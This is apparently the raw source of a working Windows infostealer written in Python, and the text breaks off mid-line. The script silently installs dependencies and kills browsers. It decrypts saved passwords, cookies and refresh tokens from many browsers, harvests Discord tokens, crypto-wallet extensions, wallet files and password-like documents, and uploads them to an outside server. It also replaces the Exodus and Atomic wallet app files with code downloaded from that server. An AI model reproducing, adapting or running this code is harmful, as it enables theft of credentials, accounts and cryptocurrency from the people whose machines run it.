Created
January 13, 2025 18:20
import base64\nimport json\nimport os\nimport re\nimport sqlite3\nimport shutil\nimport subprocess\nimport zipfile\nimport sys\nfrom zipfile import ZipFile\nfrom urllib.request import Request, urlopen\nimport time\n\nuserid = "3"\n\nCURRENT_INTERPRETER = sys.executable\nproc = subprocess.Popen([CURRENT_INTERPRETER, "-m", "pip", "install", "pycryptodome", "pypiwin32", "pywin32","requests", "websocket-client"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,creationflags=subprocess.CREATE_NO_WINDOW)\nproc.wait()\n\ntry:\n import win32crypt\n from Crypto.Cipher import AES\n import requests\n import websocket\n\nexcept:\n current_file = os.path.abspath(__file__)\n subprocess.Popen([CURRENT_INTERPRETER, current_file], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,creationflags=subprocess.CREATE_NO_WINDOW)\n exit()\n\nUSER_PROFILE = os.getenv(\'USERPROFILE\')\nAPPDATA = os.getenv(\'APPDATA\')\nLOCALAPPDATA = os.getenv(\'LOCALAPPDATA\')\nSTORAGE_PATH = os.path.join(APPDATA, "Microsoft Store")\nMAIN_URL = "https://pentagon.cy"\nPROGRAMFILESX86 = os.getenv("ProgramFiles(x86)")\n\nCOOKIECOUNT = 0\nFILES = []\n\nif os.path.exists(os.path.join(LOCALAPPDATA, "HD Realtek Audio Player")):\n sys.exit(0)\nelse:\n os.makedirs(os.path.join(LOCALAPPDATA, "HD Realtek Audio Player"))\n\nif not os.path.exists(STORAGE_PATH):\n os.makedirs(STORAGE_PATH)\n\nCHROME_PATHS = [\n {"name": "Chrome", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data"), "taskname": "chrome.exe", "exepath": "C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe"},\n\t{"name": "Chrome (x86)", "path": os.path.join(LOCALAPPDATA, "Google(x86)", "Chrome", "User Data"), "taskname": "chrome.exe", "exepath": PROGRAMFILESX86 + "\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe"},\n\t{"name": "Chrome SxS", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome SxS", "User Data"), "taskname": "chrome.exe", "exepath": LOCALAPPDATA + "\\\\Google\\\\Chrome 
SxS\\\\Application\\\\chrome.exe"},\n\t{"name": "Edge", "path": os.path.join(LOCALAPPDATA, "Microsoft", "Edge", "User Data"), "taskname": "msedge.exe", "exepath": PROGRAMFILESX86 + "\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe"},\n\t{"name": "Brave", "path": os.path.join(LOCALAPPDATA, "BraveSoftware", "Brave-Browser", "User Data"), "taskname": "brave.exe", "exepath": "C:\\\\Program Files\\\\BraveSoftware\\\\Brave-Browser\\\\Application\\\\brave.exe"},\n]\n\nCHROMIUM_BROWSERS = [\n {"name": "Chrome", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data"), "taskname": "chrome.exe", "exepath": "C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe"},\n\t{"name": "Chrome (x86)", "path": os.path.join(LOCALAPPDATA, "Google(x86)", "Chrome", "User Data"), "taskname": "chrome.exe", "exepath": PROGRAMFILESX86 + "\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe"},\n\t{"name": "Chrome SxS", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome SxS", "User Data"), "taskname": "chrome.exe", "exepath": LOCALAPPDATA + "\\\\Google\\\\Chrome SxS\\\\Application\\\\chrome.exe"},\n\t{"name": "Edge", "path": os.path.join(LOCALAPPDATA, "Microsoft", "Edge", "User Data"), "taskname": "msedge.exe", "exepath": PROGRAMFILESX86 + "\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe"},\n\t{"name": "Brave", "path": os.path.join(LOCALAPPDATA, "BraveSoftware", "Brave-Browser", "User Data"), "taskname": "brave.exe", "exepath": "C:\\\\Program Files\\\\BraveSoftware\\\\Brave-Browser\\\\Application\\\\brave.exe"},\n {"name": "Opera", "path": os.path.join(APPDATA, "Opera Software", "Opera Stable"), "taskname": "opera.exe", "exepath": ""},\n {"name": "Opera GX", "path": os.path.join(APPDATA, "Opera Software", "Opera GX Stable"), "taskname": "opera.exe", "exepath": ""},\n {"name": "Yandex", "path": os.path.join(APPDATA, "Yandex", "YandexBrowser", "User Data"), "taskname": "yandex.exe", "exepath": ""},\n {"name": "Chromium", "path": os.path.join(LOCALAPPDATA, "Chromium", 
"User Data"), "taskname": "chromium.exe", "exepath": ""},\n {"name": "Thorium", "path": os.path.join(LOCALAPPDATA, "Thorium", "User Data"), "taskname": "thorium.exe", "exepath": ""},\n {"name": "Maple", "path": os.path.join(LOCALAPPDATA, "MapleStudio", "ChromePlus", "User Data"), "taskname": "maple.exe", "exepath": ""},\n {"name": "Iridium", "path": os.path.join(LOCALAPPDATA, "Iridium", "User Data"), "taskname": "iridium.exe", "exepath": ""},\n {"name": "7Star", "path": os.path.join(LOCALAPPDATA, "7Star", "7Star", "User Data"), "taskname": "7star.exe", "exepath": ""},\n {"name": "CentBrowser", "path": os.path.join(LOCALAPPDATA, "CentBrowser", "User Data"), "taskname": "centbrowser.exe", "exepath": ""},\n {"name": "Chedot", "path": os.path.join(LOCALAPPDATA, "Chedot", "User Data"), "taskname": "chedot.exe", "exepath": ""},\n {"name": "Vivaldi", "path": os.path.join(LOCALAPPDATA, "Vivaldi", "User Data"), "taskname": "vivaldi.exe", "exepath": ""},\n {"name": "Kometa", "path": os.path.join(LOCALAPPDATA, "Kometa", "User Data"), "taskname": "kometa.exe", "exepath": ""},\n {"name": "Elements", "path": os.path.join(LOCALAPPDATA, "Elements Browser", "User Data"), "taskname": "elements.exe", "exepath": ""},\n {"name": "Epic Privacy Browser", "path": os.path.join(LOCALAPPDATA, "Epic Privacy Browser", "User Data"), "taskname": "epic.exe", "exepath": ""},\n {"name": "Uran", "path": os.path.join(LOCALAPPDATA, "uCozMedia", "Uran", "User Data"), "taskname": "uran.exe", "exepath": ""},\n {"name": "Fenrir", "path": os.path.join(LOCALAPPDATA, "Fenrir Inc", "Sleipnir5", "setting", "modules", "ChromiumViewer"), "taskname": "fenrir.exe", "exepath": ""},\n {"name": "Catalina", "path": os.path.join(LOCALAPPDATA, "CatalinaGroup", "Citrio", "User Data"), "taskname": "catalina.exe", "exepath": ""},\n {"name": "Coowon", "path": os.path.join(LOCALAPPDATA, "Coowon", "Coowon", "User Data"), "taskname": "coowon.exe", "exepath": ""},\n {"name": "Liebao", "path": os.path.join(LOCALAPPDATA, 
"liebao", "User Data"), "taskname": "liebao.exe", "exepath": ""},\n {"name": "QIP Surf", "path": os.path.join(LOCALAPPDATA, "QIP Surf", "User Data"), "taskname": "qipsurf.exe", "exepath": ""},\n {"name": "Orbitum", "path": os.path.join(LOCALAPPDATA, "Orbitum", "User Data"), "taskname": "orbitum.exe", "exepath": ""},\n {"name": "Dragon", "path": os.path.join(LOCALAPPDATA, "Comodo", "Dragon", "User Data"), "taskname": "dragon.exe", "exepath": ""},\n {"name": "360Browser", "path": os.path.join(LOCALAPPDATA, "360Browser", "Browser", "User Data"), "taskname": "360browser.exe", "exepath": ""},\n {"name": "Maxthon", "path": os.path.join(LOCALAPPDATA, "Maxthon3", "User Data"), "taskname": "maxthon.exe", "exepath": ""},\n {"name": "K-Melon", "path": os.path.join(LOCALAPPDATA, "K-Melon", "User Data"), "taskname": "kmelon.exe", "exepath": ""},\n {"name": "CocCoc", "path": os.path.join(LOCALAPPDATA, "CocCoc", "Browser", "User Data"), "taskname": "coccoc.exe", "exepath": ""},\n {"name": "Amigo", "path": os.path.join(LOCALAPPDATA, "Amigo", "User Data"), "taskname": "amigo.exe", "exepath": ""},\n {"name": "Torch", "path": os.path.join(LOCALAPPDATA, "Torch", "User Data"), "taskname": "torch.exe", "exepath": ""},\n {"name": "Sputnik", "path": os.path.join(LOCALAPPDATA, "Sputnik", "Sputnik", "User Data"), "taskname": "sputnik.exe", "exepath": ""},\n {"name": "DCBrowser", "path": os.path.join(LOCALAPPDATA, "DCBrowser", "User Data"), "taskname": "dcbrowser.exe", "exepath": ""},\n {"name": "UR Browser", "path": os.path.join(LOCALAPPDATA, "UR Browser", "User Data"), "taskname": "urbrowser.exe", "exepath": ""},\n {"name": "Slimjet", "path": os.path.join(LOCALAPPDATA, "Slimjet", "User Data"), "taskname": "slimjet.exe", "exepath": ""},\n]\n\nCHROMIUM_SUBPATHS = [\n {"path": ""},\n {"path": "Default"},\n {"path": "Profile 1"},\n {"path": "Profile 2"},\n {"path": "Profile 3"},\n {"path": "Profile 4"},\n {"path": "Profile 5"},\n]\n\nBROWSER_EXTENSIONS = [\n {"name": "Authenticator", "path": 
"\\\\Local Extension Settings\\\\bhghoamapcdpbohphigoooaddinpkbai"},\n {"name": "Binance", "path": "\\\\Local Extension Settings\\\\fhbohimaelbohpjbbldcngcnapndodjp"},\n {"name": "Bitapp", "path": "\\\\Local Extension Settings\\\\fihkakfobkmkjojpchpfgcmhfjnmnfpi"},\n {"name": "BoltX", "path": "\\\\Local Extension Settings\\\\aodkkagnadcbobfpggfnjeongemjbjca"},\n {"name": "Coin98", "path": "\\\\Local Extension Settings\\\\aeachknmefphepccionboohckonoeemg"},\n {"name": "Coinbase", "path": "\\\\Local Extension Settings\\\\hnfanknocfeofbddgcijnmhnfnkdnaad"},\n {"name": "Core", "path": "\\\\Local Extension Settings\\\\agoakfejjabomempkjlepdflaleeobhb"},\n {"name": "Crocobit", "path": "\\\\Local Extension Settings\\\\pnlfjmlcjdjgkddecgincndfgegkecke"},\n {"name": "Equal", "path": "\\\\Local Extension Settings\\\\blnieiiffboillknjnepogjhkgnoapac"},\n {"name": "Ever", "path": "\\\\Local Extension Settings\\\\cgeeodpfagjceefieflmdfphplkenlfk"},\n {"name": "ExodusWeb3", "path": "\\\\Local Extension Settings\\\\aholpfdialjgjfhomihkjbmgjidlcdno"},\n {"name": "Fewcha", "path": "\\\\Local Extension Settings\\\\ebfidpplhabeedpnhjnobghokpiioolj"},\n {"name": "Finnie", "path": "\\\\Local Extension Settings\\\\cjmkndjhnagcfbpiemnkdpomccnjblmj"},\n {"name": "Guarda", "path": "\\\\Local Extension Settings\\\\hpglfhgfnhbgpjdenjgmdgoeiappafln"},\n {"name": "Guild", "path": "\\\\Local Extension Settings\\\\nanjmdknhkinifnkgdcggcfnhdaammmj"},\n {"name": "HarmonyOutdated", "path": "\\\\Local Extension Settings\\\\fnnegphlobjdpkhecapkijjdkgcjhkib"},\n {"name": "Iconex", "path": "\\\\Local Extension Settings\\\\flpiciilemghbmfalicajoolhkkenfel"},\n {"name": "Jaxx Liberty", "path": "\\\\Local Extension Settings\\\\cjelfplplebdjjenllpjcblmjkfcffne"},\n {"name": "Kaikas", "path": "\\\\Local Extension Settings\\\\jblndlipeogpafnldhgmapagcccfchpi"},\n {"name": "KardiaChain", "path": "\\\\Local Extension Settings\\\\pdadjkfkgcafgbceimcpbkalnfnepbnk"},\n {"name": "Keplr", "path": "\\\\Local 
Extension Settings\\\\dmkamcknogkgcdfhhbddcghachkejeap"},\n {"name": "Liquality", "path": "\\\\Local Extension Settings\\\\kpfopkelmapcoipemfendmdcghnegimn"},\n {"name": "MEWCX", "path": "\\\\Local Extension Settings\\\\nlbmnnijcnlegkjjpcfjclmcfggfefdm"},\n {"name": "MaiarDEFI", "path": "\\\\Local Extension Settings\\\\dngmlblcodfobpdpecaadgfbcggfjfnm"},\n {"name": "Martian", "path": "\\\\Local Extension Settings\\\\efbglgofoippbgcjepnhiblaibcnclgk"},\n {"name": "Math", "path": "\\\\Local Extension Settings\\\\afbcbjpbpfadlkmhmclhkeeodmamcflc"},\n {"name": "Metamask", "path": "\\\\Local Extension Settings\\\\nkbihfbeogaeaoehlefnkodbefgpgknn"},\n {"name": "Metamask2", "path": "\\\\Local Extension Settings\\\\ejbalbakoplchlghecdalmeeeajnimhm"},\n {"name": "Mobox", "path": "\\\\Local Extension Settings\\\\fcckkdbjnoikooededlapcalpionmalo"},\n {"name": "Nami", "path": "\\\\Local Extension Settings\\\\lpfcbjknijpeeillifnkikgncikgfhdo"},\n {"name": "Nifty", "path": "\\\\Local Extension Settings\\\\jbdaocneiiinmjbjlgalhcelgbejmnid"},\n {"name": "Oxygen", "path": "\\\\Local Extension Settings\\\\fhilaheimglignddkjgofkcbgekhenbh"},\n {"name": "PaliWallet", "path": "\\\\Local Extension Settings\\\\mgffkfbidihjpoaomajlbgchddlicgpn"},\n {"name": "Petra", "path": "\\\\Local Extension Settings\\\\ejjladinnckdgjemekebdpeokbikhfci"},\n {"name": "Phantom", "path": "\\\\Local Extension Settings\\\\bfnaelmomeimhlpmgjnjophhpkkoljpa"},\n {"name": "Pontem", "path": "\\\\Local Extension Settings\\\\phkbamefinggmakgklpkljjmgibohnba"},\n {"name": "Ronin", "path": "\\\\Local Extension Settings\\\\fnjhmkhhmkbjkkabndcnnogagogbneec"},\n {"name": "Safepal", "path": "\\\\Local Extension Settings\\\\lgmpcpglpngdoalbgeoldeajfclnhafa"},\n {"name": "Saturn", "path": "\\\\Local Extension Settings\\\\nkddgncdjgjfcddamfgcmfnlhccnimig"},\n {"name": "Slope", "path": "\\\\Local Extension Settings\\\\pocmplpaccanhmnllbbkpgfliimjljgo"},\n {"name": "Solfare", "path": "\\\\Local Extension 
Settings\\\\bhhhlbepdkbapadjdnnojkbgioiodbic"},\n {"name": "Sollet", "path": "\\\\Local Extension Settings\\\\fhmfendgdocmcbmfikdcogofphimnkno"},\n {"name": "Starcoin", "path": "\\\\Local Extension Settings\\\\mfhbebgoclkghebffdldpobeajmbecfk"},\n {"name": "Swash", "path": "\\\\Local Extension Settings\\\\cmndjbecilbocjfkibfbifhngkdmjgog"},\n {"name": "TempleTezos", "path": "\\\\Local Extension Settings\\\\ookjlbkiijinhpmnjffcofjonbfbgaoc"},\n {"name": "TerraStation", "path": "\\\\Local Extension Settings\\\\aiifbnbfobpmeekipheeijimdpnlpgpp"},\n {"name": "Tokenpocket", "path": "\\\\Local Extension Settings\\\\mfgccjchihfkkindfppnaooecgfneiii"},\n {"name": "Ton", "path": "\\\\Local Extension Settings\\\\nphplpgoakhhjchkkhmiggakijnkhfnd"},\n {"name": "Tron", "path": "\\\\Local Extension Settings\\\\ibnejdfjmmkpcnlpebklmnkoeoihofec"},\n {"name": "Trust Wallet", "path": "\\\\Local Extension Settings\\\\egjidjbpglichdcondbcbdnbeeppgdph"},\n {"name": "Wombat", "path": "\\\\Local Extension Settings\\\\amkmjjmmflddogmhpjloimipbofnfjih"},\n {"name": "XDEFI", "path": "\\\\Local Extension Settings\\\\hmeobnfnfcmdkdcmlblgagmfpfboieaf"},\n {"name": "XMR.PT", "path": "\\\\Local Extension Settings\\\\eigblbgjknlfbajkfhopmcojidlgcehm"},\n {"name": "XinPay", "path": "\\\\Local Extension Settings\\\\bocpokimicclpaiekenaeelehdjllofo"},\n {"name": "Yoroi", "path": "\\\\Local Extension Settings\\\\ffnbelfdoeiohenkjibnmadjiehjhajb"},\n {"name": "iWallet", "path": "\\\\Local Extension Settings\\\\kncchdigobghenbbaddojjnnaogfppfj"}\n]\n\nWALLET_PATHS = [\n {"name": "Atomic", "path": os.path.join(APPDATA, "atomic", "Local Storage", "leveldb")},\n {"name": "Exodus", "path": os.path.join(APPDATA, "Exodus", "exodus.wallet")},\n {"name": "Electrum", "path": os.path.join(APPDATA, "Electrum", "wallets")},\n {"name": "Electrum-LTC", "path": os.path.join(APPDATA, "Electrum-LTC", "wallets")},\n {"name": "Zcash", "path": os.path.join(APPDATA, "Zcash")},\n {"name": "Armory", "path": 
os.path.join(APPDATA, "Armory")},\n {"name": "Bytecoin", "path": os.path.join(APPDATA, "bytecoin")},\n {"name": "Jaxx", "path": os.path.join(APPDATA, "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb")},\n {"name": "Etherium", "path": os.path.join(APPDATA, "Ethereum", "keystore")},\n {"name": "Guarda", "path": os.path.join(APPDATA, "Guarda", "Local Storage", "leveldb")},\n {"name": "Coinomi", "path": os.path.join(APPDATA, "Coinomi", "Coinomi", "wallets")},\n]\n\nPATHS_TO_SEARCH = [\n USER_PROFILE + "\\\\Desktop",\n USER_PROFILE + "\\\\Documents",\n USER_PROFILE + "\\\\Downloads",\n USER_PROFILE + "\\\\OneDrive\\\\Documents",\n USER_PROFILE + "\\\\OneDrive\\\\Desktop",\n]\n\nFILE_KEYWORDS = [\n "passw",\n "mdp",\n "motdepasse",\n "mot_de_passe",\n "login",\n "secret",\n "account",\n "acount",\n "paypal",\n "banque",\n "metamask",\n "wallet",\n "crypto",\n "exodus",\n "discord",\n "2fa",\n "code",\n "memo",\n "compte",\n "token",\n "backup",\n "seecret"\n "passphrase"\n]\n\nALLOWED_EXTENSIONS = [\n ".txt",\n ".log",\n ".doc",\n ".docx",\n ".xls",\n ".xlsx",\n ".ppt",\n ".pptx",\n ".odt",\n ".pdf",\n ".rtf",\n ".json",\n ".csv",\n ".db",\n ".jpg",\n ".jpeg",\n ".png",\n ".gif",\n ".webp",\n ".mp4"\n]\n\nDISCORD_PATHS = [\n {"name": "Discord", "path": os.path.join(APPDATA, "discord", "Local Storage", "leveldb")},\n {"name": "Discord Canary", "path": os.path.join(APPDATA, "discordcanary", "Local Storage", "leveldb")},\n {"name": "Discord PTB", "path": os.path.join(APPDATA, "discordptb", "Local Storage", "leveldb")},\n {"name": "Opera", "path": os.path.join(APPDATA, "Opera Software", "Opera Stable", "Local Storage", "leveldb")},\n {"name": "Opera GX", "path": os.path.join(APPDATA, "Opera Software", "Opera GX Stable", "Local Storage", "leveldb")},\n {"name": "Amigo", "path": os.path.join(LOCALAPPDATA, "Amigo", "User Data", "Local Storage", "leveldb")},\n {"name": "Torch", "path": os.path.join(LOCALAPPDATA, "Torch", "User Data", "Local Storage", "leveldb")},\n 
{"name": "Kometa", "path": os.path.join(LOCALAPPDATA, "Kometa", "User Data", "Local Storage", "leveldb")},\n {"name": "Orbitum", "path": os.path.join(LOCALAPPDATA, "Orbitum", "User Data", "Local Storage", "leveldb")},\n {"name": "CentBrowser", "path": os.path.join(LOCALAPPDATA, "CentBrowser", "User Data", "Local Storage", "leveldb")},\n {"name": "7Star", "path": os.path.join(LOCALAPPDATA, "7Star", "7Star", "User Data", "Local Storage", "leveldb")},\n {"name": "Sputnik", "path": os.path.join(LOCALAPPDATA, "Sputnik", "Sputnik", "User Data", "Local Storage", "leveldb")},\n {"name": "Vivaldi", "path": os.path.join(LOCALAPPDATA, "Vivaldi", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Chrome SxS", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome SxS", "User Data", "Local Storage", "leveldb")},\n {"name": "Chrome", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Chrome1", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 1", "Local Storage", "leveldb")},\n {"name": "Chrome2", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 2", "Local Storage", "leveldb")},\n {"name": "Chrome3", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 3", "Local Storage", "leveldb")},\n {"name": "Chrome4", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 4", "Local Storage", "leveldb")},\n {"name": "Chrome5", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 5", "Local Storage", "leveldb")},\n {"name": "Epic Privacy Browser", "path": os.path.join(LOCALAPPDATA, "Epic Privacy Browser", "User Data", "Local Storage", "leveldb")},\n {"name": "Microsoft Edge", "path": os.path.join(LOCALAPPDATA, "Microsoft", "Edge", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Uran", "path": os.path.join(LOCALAPPDATA, "uCozMedia", "Uran", "User Data", "Default", 
"Local Storage", "leveldb")},\n {"name": "Yandex", "path": os.path.join(LOCALAPPDATA, "Yandex", "YandexBrowser", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Brave", "path": os.path.join(LOCALAPPDATA, "BraveSoftware", "Brave-Browser", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Iridium", "path": os.path.join(LOCALAPPDATA, "Iridium", "User Data", "Default", "Local Storage", "leveldb")}\n]\n\nDISCORD_TOKENS = []\nPASSWORDS = []\nCOOKIES = []\nWEB_DATA = []\nDISCORD_IDS = []\n\ndef kill_process(process_name):\n result = subprocess.Popen(f"taskkill /im {process_name} /t /f >nul 2>&1", shell=True)\n\ndef decrypt_data(data, key):\n try:\n iv = data[3:15]\n data = data[15:]\n cipher = AES.new(key, AES.MODE_GCM, iv)\n return cipher.decrypt(data)[:-16].decode()\n except:\n return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])\n\ndef zip_to_storage(name, source, destination):\n if os.path.isfile(source):\n with zipfile.ZipFile(destination + f"\\\\{name}.zip", "w") as z:\n z.write(source, os.path.basename(source))\n else:\n with zipfile.ZipFile(destination + f"\\\\{name}.zip", "w") as z:\n for root, dirs, files in os.walk(source):\n for file in files:\n z.write(os.path.join(root, file), os.path.relpath(os.path.join(root, file), os.path.join(source, \'..\')))\n\ndef upload_to_server(filepath, loguuid):\n for i in range(10):\n try:\n url = MAIN_URL + "/delivery"\n files = {\'file\': open(filepath, \'rb\')}\n headers = {\'X-Trace-ID\': loguuid}\n r = requests.post(url, files=files, headers = headers)\n if r.status_code == 200:\n break\n except: pass\n\ndef validate_discord_token(token):\n r = requests.get("https://discord.com/api/v9/users/@me", headers={"Authorization": token})\n if r.status_code == 200:\n return r.json()\n else:\n return None\n\ndef taskkill(taskname):\n subprocess.run(["taskkill", "/F", "/IM", taskname], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n\ndef inject(loguuid):\n path = 
os.path.join(LOCALAPPDATA, "exodus")\n if not os.path.exists(path): return\n listOfFile = os.listdir(path)\n apps = []\n for file in listOfFile:\n if "app-" in file:\n apps += [file]\n exodusPatchURL = MAIN_URL + "/exodus"\n req = Request(exodusPatchURL)\n response = urlopen(req)\n data = response.read()\n kill_process("exodus.exe")\n for app in apps:\n try:\n fullpath = f"{path}\\\\{app}\\\\resources\\\\app.asar"\n\n with open(fullpath, \'wb\') as out_file1:\n\n out_file1.write(data)\n licensepath = f"{path}\\\\{app}\\\\LICENSE"\n with open(licensepath, "w") as out_file2:\n out_file2.write(loguuid)\n\n except: pass\n\ndef inject_atomic(loguuid):\n path = os.path.join(LOCALAPPDATA, "Programs", "atomic")\n if not os.path.exists(path): return\n atomicPatchURL = MAIN_URL + "/atomic"\n req = Request(atomicPatchURL)\n response = urlopen(req)\n data = response.read()\n kill_process("Atomic Wallet.exe")\n try:\n fullpath = f"{path}\\\\resources\\\\app.asar"\n with open(fullpath, \'wb\') as out_file1:\n\n out_file1.write(data)\n licensepath = f"{path}\\\\LICENSE.electron.txt"\n with open(licensepath, "w") as out_file2:\n out_file2.write(loguuid)\n except: pass\n\ndef chromiumcookies(profilepath):\n try:\n cookies_file = os.path.join(profilepath, "Network", "Cookies")\n temp_db = os.path.join(profilepath, f"{browser[\'name\']}-ck.db")\n shutil.copy(cookies_file, temp_db)\n connection = sqlite3.connect(temp_db)\n cursor = connection.cursor()\n\n cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")\n\n cookie_str = ""\n\n for row in cursor.fetchall():\n\n host = row[0]\n\n name = row[1]\n\n value = decrypt_data(row[2], decryption_key)\n\n cookie_str += f"{host}\\tTRUE\\t/\\tFALSE\\t13355861278849698\\t{name}\\t{value}\\n"\n COOKIECOUNT = COOKIECOUNT+1\n COOKIES.append({"browser": browser["name"], "profile": subpath["name"], "cookies": base64.b64encode(cookie_str.encode()).decode()})\n cursor.close()\n connection.close()\n os.remove(temp_db)\n except: 
pass\n\nfor browser in CHROMIUM_BROWSERS:\n taskkill(browser["taskname"])\n local_state = os.path.join(browser["path"], "Local State")\n if not os.path.exists(local_state): continue\n\n with open(local_state, "r", encoding="utf-8") as f:\n local_state = json.loads(f.read())\n\n key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]\n try:\n decryption_key = win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]\n except:\n pass\n for subpath in CHROMIUM_SUBPATHS:\n\n if not os.path.exists(os.path.join(browser["path"], subpath["path"])): continue\n\n try:\n login_data_file = os.path.join(browser["path"], subpath["path"], "Login Data")\n temp_db = os.path.join(browser["path"], subpath["path"], f"{browser[\'name\']}-pw.db")\n shutil.copy(login_data_file, temp_db)\n\n connection = sqlite3.connect(temp_db)\n\n cursor = connection.cursor()\n\n cursor.execute("SELECT origin_url, username_value, password_value FROM logins")\n\n for row in cursor.fetchall():\n\n origin_url = row[0]\n\n username = row[1]\n\n password = decrypt_data(row[2], decryption_key)\n\n if username or password:\n PASSWORDS.append({"browser": browser["name"], "url": origin_url, "username": username, "password": password})\n cursor.close()\n connection.close()\n os.remove(temp_db)\n\n except:\n pass\n\n try:\n if browser["exepath"] == "":\n chromiumcookies(os.path.join(browser["path"], subpath["path"]))\n except:\n pass\n\n try:\n web_data_file = os.path.join(browser["path"], subpath["path"], "Web Data")\n\n temp_db = os.path.join(browser["path"], subpath["path"], f"{browser[\'name\']}-webdata.db")\n\n shutil.copy(web_data_file, temp_db)\n\n connection = sqlite3.connect(temp_db)\n\n cursor = connection.cursor()\n\n cursor.execute("SELECT service, encrypted_token FROM token_service")\n\n for row in cursor.fetchall():\n web_service = row[0]\n web_token = decrypt_data(row[1], decryption_key)\n WEB_DATA.append({"account_id": web_service, "refresh_token": web_token})\n\n cursor.close()\n\n 
connection.close()\n os.remove(temp_db)\n except:\n pass\n\n for extension in BROWSER_EXTENSIONS:\n extension_path = os.path.join(browser["path"], subpath["path"]) + extension["path"]\n if os.path.exists(extension_path):\n try:\n zip_to_storage(f"{browser[\'name\']}-{subpath[\'name\']}-{extension[\'name\']}", extension_path, STORAGE_PATH)\n except:\n pass\n\nfirefox_path = os.path.join(APPDATA, \'Mozilla\', \'Firefox\', \'Profiles\')\n\nif os.path.exists(firefox_path):\n taskkill("firefox.exe")\n for profile in os.listdir(firefox_path):\n\n try:\n\n if profile.endswith(\'.default\') or profile.endswith(\'.default-release\'):\n\n profile_path = os.path.join(firefox_path, profile)\n\n if os.path.exists(os.path.join(profile_path, "cookies.sqlite")):\n\n shutil.copy(os.path.join(profile_path, "cookies.sqlite"), os.path.join(profile_path, "cookies-copy.sqlite"))\n connection = sqlite3.connect(os.path.join(profile_path, "cookies-copy.sqlite"))\n cursor = connection.cursor()\n\n cursor.execute("SELECT host, name, value FROM moz_cookies")\n\n cookie_str = ""\n for row in cursor.fetchall():\n host, name, value = row\n cookie_str += f"{host}\\tTRUE\\t/\\tFALSE\\t13355861278849698\\t{name}\\t{value}\\n"\n COOKIECOUNT = COOKIECOUNT+1\n COOKIES.append({"browser": "Firefox", "profile": profile, "cookies": base64.b64encode(cookie_str.encode()).decode()})\n cursor.close()\n connection.close()\n os.remove(os.path.join(profile_path, "cookies-copy.sqlite"))\n except:\n continue\n\nfor wallet_file in WALLET_PATHS:\n if os.path.exists(wallet_file["path"]):\n try:\n zip_to_storage(wallet_file["name"], wallet_file["path"], STORAGE_PATH)\n except:\n pass\n\nfor discord_path in DISCORD_PATHS:\n if not os.path.exists(discord_path["path"]): continue\n try:\n name_without_spaces = discord_path["name"].replace(" ", "")\n if "cord" in discord_path["path"]:\n if not os.path.exists(APPDATA + f"\\\\{name_without_spaces}\\\\Local State"): continue\n try:\n with open(APPDATA + 
f"\\\\{name_without_spaces}\\\\Local State", "r", encoding="utf-8") as f:\n local_state = json.loads(f.read())\n\n key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]\n\n decryption_key = win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]\n\n for file_name in os.listdir(discord_path["path"]):\n if file_name[-3:] not in ["ldb", "log"]: continue\n for line in [x.strip() for x in open(f\'{discord_path["path"]}\\\\{file_name}\', errors=\'ignore\').readlines() if x.strip()]:\n for y in re.findall(r"dQw4w9WgXcQ:[^\\"]*", line):\n\n token = decrypt_data(base64.b64decode(y.split(\'dQw4w9WgXcQ:\')[1]), decryption_key)\n token_data = validate_discord_token(token)\n\n if token_data:\n if token_data["id"] not in DISCORD_IDS:\n DISCORD_IDS.append(token_data["id"])\n username = token_data["username"] if token_data["discriminator"] == "0" else f"{token_data[\'username\']}#{token_data[\'discriminator\']}"\n phone_number = token_data["phone"] if token_data["phone"] else "Not linked"\n DISCORD_TOKENS.append(\n {"token": token, "user_id": token_data["id"], "username": username,\n "displayname": token_data["global_name"], "email": token_data["email"],\n "phone": phone_number})\n TOKENCOUNT = TOKENCOUNT+1\n except:\n pass\n else:\n for file_name in os.listdir(discord_path["path"]):\n if file_name[-3:] not in ["ldb", "log"]: continue\n for line in [x.strip() for x in open(f\'{discord_path["path"]}\\\\{file_name}\', errors=\'ignore\').readlines() if x.strip()]:\n for token in re.findall(r"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}", line):\n token_data = validate_discord_token(token)\n if token_data:\n if token_data["id"] not in DISCORD_IDS:\n DISCORD_IDS.append(token_data["id"])\n username = token_data["username"] if token_data["discriminator"] == "0" else f"{token_data[\'username\']}#{token_data[\'discriminator\']}"\n phone_number = token_data["phone"] if token_data["phone"] else "Not linked"\n DISCORD_TOKENS.append(\n {"token": token, "user_id": token_data["id"], 
